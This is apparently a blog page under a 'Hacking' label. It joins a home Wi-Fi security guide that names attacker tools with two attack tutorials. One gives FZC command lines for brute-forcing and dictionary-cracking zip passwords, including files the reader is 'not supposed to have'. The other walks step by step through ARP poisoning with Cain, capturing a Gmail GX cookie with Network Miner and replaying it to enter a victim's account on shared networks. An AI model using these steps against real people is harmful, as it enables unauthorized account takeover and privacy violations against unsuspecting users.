This article describes how you can secure your Wireless Network from hackers and you’ll also learn about free tools that people generally use to intercept your Wi-Fi signals.
Wireless Networking (Wi-Fi) has made it so easy for you to use the computer, portable media player, mobile phones, video game consoles, and other wireless devices anywhere in the house without the clutter of cables.
With traditional wired networks, it is extremely difficult for someone to steal your bandwidth but the big problem with wireless signals is that others can access the Internet using your broadband connection even while they are in a neighboring building or sitting in a car that’s parked outside your apartment.
This practice, also known as piggybacking, is bad for three reasons:
* It will increase your monthly Internet bill especially when you have to pay per byte of data transfer.
* It will decrease your Internet access speed since you are now sharing the same internet connection with other users.
* It can create a security hazard* as others may hack your computers and access your personal files through your own wireless network.
*] What do the bad guys use - There have been quite a few instances where innocent Internet users have been arrested for sending hate emails when in reality, their email accounts where hacked though the unsecured Wi-Fi networks that they had at home. Wireshark is a free packet sniffing tool for Linux, Mac and Windows that can scan traffic flowing though a wireless network including cookies, forms and other HTTP requests.
How to Secure Your Wireless Network
The good news is that it is not very hard to make your wireless network secure, which will both prevent others from stealing your internet and will also prevent hackers from taking control of your computers through your own wireless network.
Here a few simple things that you should to secure your wireless network:
Step 1. Open your router settings page
You can also use Google to find the manuals for most routers online in case you lost the printed manual that came with your router purchase. For your reference, here are some of the popular router brands – Linksys, Cisco, Netgear, Apple AirPort, SMC, D-Link, Buffalo, TP-LINK, 3Com, Belkin.
Step 2. Create a unique password on your router
Once you have logged into your router, the first thing you should do to secure your network is to change the default password* of the router to something more secure.
This will prevent others from accessing the router and you can easily maintain the security settings that you want. You can change the password from the Administration settings on your router’s settings page. The default values are generally admin / password.
[*] What do the bad guys use - This is a public database[http://www.cirt.net/passwords] of default usernames and passwords of wireless routers, modems, switches and other networking equipment. For instance, anyone can easily make out from the database that the factory-default settings for Linksys equipment can be accessed by using admin for both username and password fields.
Step 3. Change your Network’s SSID name
The SSID (or Wireless Network Name) of your Wireless Router is usually pre-defined as "default" or is set as the brand name of the router (e.g., linksys). Although this will not make your network inherently* more secure, changing the SSID name of your network is a good idea as it will make it more obvious for others to know which network they are connecting to.
This setting is usually under the basic wireless settings in your router’s settings page. Once this is set, you will always be sure that you are connecting to the correct Wireless network even if there are multiple wireless networks in your area. Don’t use your name, home address or other personal information in the SSID name.
[*] What do the bad guys use
Wi-Fi scanning tools like inSSIDer[http://www.metageek.net/products/inssider] (Windows) and Kismet (Mac, Linux) are free and they will allow anyone to find all the available Wireless Networks in an area even if the routers are not broadcasting their SSID name.
Step 4. Enable Network Encryption
In order to prevent other computers in the area from using your internet connection, you need to encrypt your wireless signals.
There are several encryption methods for wireless settings, including WEP, WPA (WPA-Personal), and WPA2 (Wi-Fi Protected Access version 2). WEP is basic encryption and therefore least secure (i.e., it can be easily cracked*, but is compatible with a wide range of devices including older hardware, whereas WPA2 is the most secure but is only compatible with hardware manufactured since 2006.
To enable encryption on your Wireless network, open the wireless security settings on your router’s configuration page. This will usually let you select which security method you wish to choose; if you have older devices, choose WEP, otherwise go with WPA2. Enter a passphrase to access the network; make sure to set this to something that would be difficult for others to guess, and consider using a combination of letters, numbers, and special characters in the passphrase.
[*] What do the bad guys use
AirCrack and coWPAtty are some free tools that allow even non-hackers to crack the WEP / WPA (PSK) keys using dictionary or brute force techniques. A video on YouTube suggests that AirCrack may be easily used to break WiFi encryption using a jail-broken iPhone or an iPod Touch.
Step 5. Filter MAC addresses
Whether you have a laptop or a Wi-Fi enabled mobile phone, all your wireless devices have a unique MAC address (this has nothing to do with an Apple Mac) just like every computer connected to the Internet has a unique IP address. For an added layer of protection, you can add the MAC addresses of all your devices to your wireless router’s settings so that only the specified devices can connect to your Wi-Fi network.
MAC addresses are hard-coded into your networking equipment, so one address will only let that one device on the network. It is, unfortunately, possible to spoof a MAC address*, but an attacker must first know one of the MAC addresses of the computers that are connected to your Wireless network before he can attempt spoofing.
To enable MAC address filtering, first make a list of all your hardware devices that you want to connect to your wireless network**. Find their MAC addresses, and then add them to the MAC address filtering in your router’s administrative settings. You can find the MAC address for your computers by opening Command Prompt and typing in “ipconfig /all”, which will show your MAC address beside the name “Physical Address”. You can find the MAC addresses of Wireless mobile phones and other portable devices under their network settings, though this will vary for each device.
[*] What do the bad guys use - Someone can change the MAC address of his or her own computer and can easily connect to your network since your network allows connection from devices that have that particular MAC address. Anyone can determine the MAC address of your device wireless using a sniffing tool like Nmap and he can then change the MAC address of his own computer using another free tool like MAC Shift.
Step 6. Reduce the Range of the Wireless Signal
If your wireless router has a high range but you are staying in a small studio apartment, you can consider decreasing the signal range by either changing the mode of your router to 802.11g (instead of 802.11n or 802.11b) or use a different wireless channel.
You can also try placing the router under the bed, inside a shoe box or wrap a foil around the router antennas so that you can somewhat restrict the direction of signals.
Apply the Anti-Wi-Fi Paint – Researchers have developed a special Wi-Fi blocking paint that can help you stop neighbors from accessing your home network without you having to set up encryption at the router level. The paint contains chemicals that blocks radio signals by absorbing them. "By coating an entire room, Wi-Fi signals can’t get in and, crucially, can’t get out."
Step 7. Upgrade your Router’s firmware
You should check the manufacturer’s site occasionally to make sure that your router is running the latest firmware. You can find the existing firmware version of your router using from the router’s dashboard at 192.168.*.
Connect to your Secure Wireless Network
To conclude, MAC Address filtering with WPA2 (AES) encryption (and a really complex passphrase) is probably the best way to secure your wireless network.
Once you have enabled the various security settings in your wireless router, you need to add the new settings to your computers and other wireless devices so that they all can connect to the Wi-Fi network. You can select to have your computer automatically connect to this network, so you won’t have to enter the SSID, passphrase and other information every time you connect to the Internet.
Your wireless network will now be a lot more secure and intruders may have a tough time intercepting your Wi-Fi signals.
Who is Connected to your Wireless Network
If you are worried that an outsider may be connecting to the Internet using your Wireless network, try AirSnare – it’s a free utility that will look for unexpected MAC addresses on your Wireless network as well as to DHCP requests. Another option is that you open your router’s administration page (using the 192.168.* address) and look for the DHCP Clients Table (it’s under Status > Local Network on Linksys routers). Here you will see a list of all computers and wireless devices that are connected to your home network.
*It is also a good idea to turn off the router completely when you are not planning to use the computer for a longer period (like when you are out shopping). You save on electricity and the door remains 100% shut for wireless piggybackers.
**If you ever want to let a new device connect to your network, you will have to find its MAC address and add it to your router. If you simple want to let a friend connect to your wireless network one time, you can remove his MAC address from the router settings when he or she leaves your place.
Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts
Sunday, December 27, 2009
Wednesday, September 23, 2009
Cracking Winzip passwords
Tut On Cracking Zip Password Files..
What is FZC? FZC is a program that cracks zip files (zip is a method of compressing multiple files into one smaller file) that are password-protected (which means you're gonna need a password to open the zip file and extract files out of it). You can get it anywhere - just use a search engine such as altavista.com.
FZC uses multiple methods of cracking - bruteforce (guessing passwords systematically until the program gets it) or wordlist attacks (otherwise known as dictionary attacks. Instead of just guessing passwords systematically, the program takes passwords out of a "wordlist", which is a text file that contains possible passwords. You can get lots of wordlists at http://www.theargon.com.).
FZC can be used in order to achieve two different goals: you can either use it to recover a lost zip password which you used to remember but somehow forgot, or to crack zip passwords which you're not supposed to have. So like every tool, this one can be used for good and for evil.
The first thing I want to say is that reading this tutorial... is the easy way to learn how to use this program, but after reading this part of how to use the FZC you should go and check the texts that come with that program and read them all. You are also going to see the phrase "check name.txt" often in this text. These files should be in FZC's directory. They contain more information about FZC.
FZC is a good password recovery tool, because it's very fast and also support resuming so you don't have to keep the computer turned on until you get the password, like it used to be some years ago with older cracking programs. You would probably always get the password unless the password is longer than 32 chars (a char is a character, which can be anything - a number, a lowercase or undercase letter or a symbol such as ! or & ) because 32 chars is the maximum value that FZC will accept, but it doesn't really matter, because in order to bruteforce a password with 32 chars you'll need to be at least immortal..heehhe.. to see the time that FZC takes with bruteforce just open the Bforce.txt file, which contains such information.
FZC supports brute-force attacks, as well as wordlist attacks. While brute-force attacks don't require you to have anything, wordlist attacks require you to have wordlists, which you can get from http://www.theargon.com. There are wordlists in various languages, various topics or just miscellaneous wordlists. The bigger the wordlist is, the more chances you have to crack the password.
Now that you have a good wordlist, just get FZC working on the locked zip file, grab a drink, lie down and wait... and wait... and wait...and have good thoughts like "In wordlist mode I'm gonna get the password in minutes" or something like this... you start doing all this and remember "Hey this guy started with all this bullshit and didn't say how I can start a wordlist attack!..." So please wait just a little more, read this tutorial 'till the end and you can do all this "bullshit".
We need to keep in mind that are some people might choose some really weird passwords (for example: 'e8t7@$^%*gfh), which are harder to crack and are certainly impossible to crack (unless you have some weird wordlist). If you have a bad luck and you got such a file, having a 200MB list won't help you anymore. Instead, you'll have to use a different type of attack. If you are a person that gives up at the first sign of failure, stop being like that or you won't get anywhere. What you need to do in such a situation is to put aside your sweet xxx MB's list and start using the Brute Force attack.
If you have some sort of a really fast and new computer and you're afraid that you won't be able to use your computer's power to the fullest because the zip cracker doesn't support this kind of technology, it's your lucky day! FZC has multiple settings for all sorts of hardware, and will automatically select the best method.
Now that we've gone through all the theoretical stuff, let's get to the actual commands.
--------------------------------------------------------------------------------
Bruteforce
--------------------------------------------------------------------------------
The command line you'll need to use for using brute force is:
fzc -mb -nzFile.zip -lChr Lenght -cType of chars
Now if you read the bforce.txt that comes with fzc you'll find the description of how works Chr Lenght and the Type of chars, but hey, I'm gonna explain this too. Why not, right?... (but remember look at the bforce.txt too)
For Chr Lenght you can use 4 kind of switches...
-> You can use range -> 4-6 :it would brute force from 4 Chr passwors to 6 chr passwords
-> You can use just one lenght -> 5 :it would just brute force using passwords with 5 chars
-> You can use also the all number -> 0 :it would start brute forcing from passwords with lenght 0 to lenght 32, even if you are crazy i don't think that you would do this.... if you are thinking in doing this get a live...
-> You can use the + sign with a number -> 3+ :in this case it would brute force from passwords with lenght 3 to passwords with 32 chars of lenght, almost like the last option...
For the Type of chars we have 5 switches they are:
-> a for using lowercase letters
-> A for using uppercase letters
-> ! for using simbols (check the Bforce.txt if you want to see what simbols)
-> s for using space
-> 1 for using numbers
Example:
If you want to find a password with lowercase and numbers by brute force you would just do something like:
fzc -mb -nzTest.zip -l4-7 -ca1
This would try all combinations from passwords with 4 chars of lenght till 7 chars, but just using numbers and lowercase.
*****
hint
*****
You should never start the first brute force attack to a file using all the chars switches, first just try lowercase, then uppercase, then uppercase with number then lowercase with numbers, just do like this because you can get lucky and find the password much faster, if this doesn't work just prepare your brain and start with a brute force that would take a lot of time. With a combination like lowercase, uppercase, special chars and numbers.
--------------------------------------------------------------------------------
Wordlis
--------------------------------------------------------------------------------
Like I said in the bottom and like you should be thinking now, the wordlist is the most powerfull mode in this program. Using this mode, you can choose between 3 modes, where each one do some changes to the text that is in the wordlist, I'm not going to say what each mode does to the words, for knowing that just check the file wlist.txt, the only thing I'm going to tell you is that the best mode to get passwords is mode 3, but it takes longer time too.
To start a wordlist attak you'll do something like.
fzc -mwMode number -nzFile.zip -nwWordlist
Where:
Mode number is 1, 2 or 3 just check wlist.txt to see the changes in each mode.
File.zip is the filename and Wordlist is the name of the wordlist that you want to use. Remember that if the file or the wordlist isn't in the same directory of FZC you'll need to give the all path.
You can add other switches to that line like -fLine where you define in which line will FZC start reading, and the -lChar Length where it will just be read the words in that char length, the switche works like in bruteforce mode.
So if you something like
fzc -mw1 -nztest.zip -nwMywordlist.txt -f50 -l9+
FZC would just start reading at line 50 and would just read with length >= to 9.
Example:
If you want to crack a file called myfile.zip using the "theargonlistserver1.txt" wordlist, selecting mode 3, and you wanted FZC to start reading at line 50 you would do:
fzc -mw3 -nzmyfile.zip -nwtheargonlistserver1.txt -f50
--------------------------------------------------------------------------------
Resuming
--------------------------------------------------------------------------------
Other good feature in FZC is that FZC supports resuming. If you need to shutdown your computer and FZC is running you just need to press the ESC key, and fzc will stop. Now if you are using a brute force attack the current status will be saved in a file called resume.fzc but if you are using a wordlist it will say to you in what line it ended (you can find the line in the file fzc.log too).
To resume the bruteforce attack you just need to do:
fzc -mr
And the bruteforce attack will start from the place where it stopped when you pressed the ESC key.
But if you want to resume a wordlist attack you'll need to start a new wordlist attack, saying where it's gonna start. So if you ended the attack to the file.zip in line 100 using wordlist.txt in mode 3 to resume you'll type
fzc -mw3 -nzfile.zip -nwwordlist.txt -f100
Doing this FZC would start in line 100, since the others 99 lines where already checked in an earlier FZC session.
Well, it looks like I covered most of what you need to know. I certainly hope it helped you... don't forget to read the files that come with the program
Hack a Gmail account with the GX cookie
Assumption:
You are in Local Area Network (LAN) in a switched / wireless environment : example : office , cyber café, Mall etc.
You know basic networking.
Tool used for this attack:
Cain & Abel downlode
Network Miner downlode
Firefox web browser with Cookie Editor add-ons downlode
details:
We assume you are connected to LAN/Wireless network. Our main goal is to capture Gmail GX cookie from the network. We can only capture cookie when someone is actually using his gmail. I’ve noticed normally in comp classes, neat the start people normally check their emails. If you are in cyber café or in Mall then there are more chances of catching people using Gmail.
We will go step by step,
If you are using Wireless network then you can skip this Step A.
A] Using Cain to do ARP poisoning and routing:
Switch allows unicast traffic mainly to pass through its ports. When X and Y are communicating eachother in switch network then Z will not come to know what X & Y are communicating, so inorder to sniff that communication you would have to poison ARP table of switch for X & Y. In Wireless you don’t have to do poisoning because Wireless Access points act like HUB which forwards any communication to all its ports (recipients).
Start Cain from Start > Program > Cain > Cain
Click on Start/Stop Snigger tool icon from the tool bar, we will first scan the network to see what all IPs are used in the network and this list will also help us to launch an attack on the victim.
Then click on Sniffer Tab then Host Tab below. Right click within that spreadsheet and click on Scan Mac Addresses, from the Target section select
All hosts in my subnet and then press Ok. This will list all host connected in your network. You will notice you won’t see your Physical IP of your machine in that list.
How to check your physical IP ?
> Click on start > Run type cmd and press enter, in the command prompt type
Ipconfig and enter. This should show your IP address assign to your PC.
It will have following outputs:
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : xyz.com
IP Address. . . . . . . . . . . . : 192.168.1.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
Main thing to know here is your IP address and your Default Gateway.
Make a note of your IP Address & default gateway. From Cain you will see list of IP addresses, here you have to choose any free IP address which is not used anywhere. We assume IP 192.168.1.10 is not used anywhere in the network.
Click on Configure > APR > Use Spoof ed IP and MAC Address > IP
Type in 192.168.1.10 and from the poisoning section click on “Use ARP request Packets� and click on OK.
Within the Sniffer Tab , below click on APR Tab, from the left hand side click on APR and now click on the right hand top spreadsheet then click on plus sign tool from top. The moment you click that it will show you list of IP address on left hand side. Here we will target the victim IP address and the default gateway.
The purpose is to do ARP poisoning between victim and the default gateway and route the victim traffic via your machine. From the left side click on Victim IP address, we assume victim is using 192.168.1.15. The moment you click on victim IP you will see remaining list on the right hand side here you have to select default gateway IP address i.e. 192.168.1.1 then click on OK.
Finally, Click on Start/Stop Sniffer tool menu once again and next click on Start/Stop APR. This will start poisoning victim and default gateway.
B] Using Network Miner to capture cookie in plain text
We are using Network miner to capture cookie, but Network miner can be used for manythings from capturing text , image, HTTP parameters, files. Network Miner is normally used in Passive reconnaissance to collect IP, domain and OS finger print of the connected device to your machine. If you don’t have Network miner you can use any other sniffer available like Wireshark, Iris network scanner, NetWitness etc.
We are using This tool because of its ease to use.
Open Network Miner by clicking its exe (pls note it requires .Net framework to work).
From the “---Select network adaptor in the list---“ click on down arrow and select your adaptor If you are using Ethernet wired network then your adaptor would have Ethernet name and IP address of your machine and if you are using wireless then adaptor name would contain wireless and your IP address. Select the one which you are using and click on start.
Important thing before you start this make sure you are not browsing any websites, or using any Instant Mesaging and you have cleared all cookies from firefox.
Click on Credential Tab above. This tab will capture all HTTP cookies , pay a close look on “Host� column you should see somewhere mail.google.com. If you could locate mail.google.com entry then in the same entry right click at Username column and click on “copy username� then open notepad and paste the copied content there.
Remove word wrap from notepad and search for GX in the line. Cookie which you have captured will contain many cookies from gmail each would be separated by semicolon ( GX cookie will start with GX= and will end with semicolon you would have to copy everything between = and semicolon
Example : GX= axcvb1mzdwkfefv ; ßcopy only axcvb1mzdwkfefv
Now we have captured GX cookie its time now to use this cookie and replay the attack and log in to victim email id, for this we will use firefox and cookie editor add-ons.
C] Using Firefox & cookie Editor to replay attack.
Open Firefox and log in your gmail email account.
from firefox click on Tools > cookie Editor.
In the filter box type .google.com and Press Filter and from below list search for cookiename GX. If you locate GX then double click on that GX cookie and then from content box delete everything and paste your captured GX cookie from stepB.4 and click on save and then close.
From the Address bar of Firefox type mail.google.com and press enter, this should replay victim GX cookie to Gmail server and you would get logged in to victim Gmail email account.
Sorry! You can’t change password with cookie attack.
How to be saved from this kind of attack?
Google has provided a way out for this attack where you can use secure cookie instead of unsecure cookie. You can enable secure cookie option to always use https from Gmail settings.
Settings > Browser connection > Always use https a
Subscribe to:
Posts (Atom)
